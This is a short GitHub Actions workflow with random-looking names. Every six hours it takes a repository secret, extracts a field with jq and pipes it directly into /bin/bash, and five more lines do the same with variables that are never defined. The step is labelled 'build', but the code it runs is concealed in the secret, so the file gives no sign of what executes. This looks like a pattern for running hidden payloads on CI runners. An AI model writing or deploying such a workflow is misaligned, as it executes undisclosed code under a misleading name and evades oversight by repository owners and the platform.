name: gelubang0987

on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gelubang0987
        env:
          jzo0: ${{ secrets.jzo0 }}
        run: |
          echo $jzo0 | jq -r .tn60 | /bin/bash
          echo $ebsli9770 | jq -r .mixz0 | /bin/bash
          echo $mw0 | jq -r .eylo2 | /bin/bash
          echo $bj19659 | jq -r .trq3225 | /bin/bash
          echo $nchi441 | jq -r .pxk6 | /bin/bash
          echo $h94887 | jq -r .fjf65917 | /bin/bash

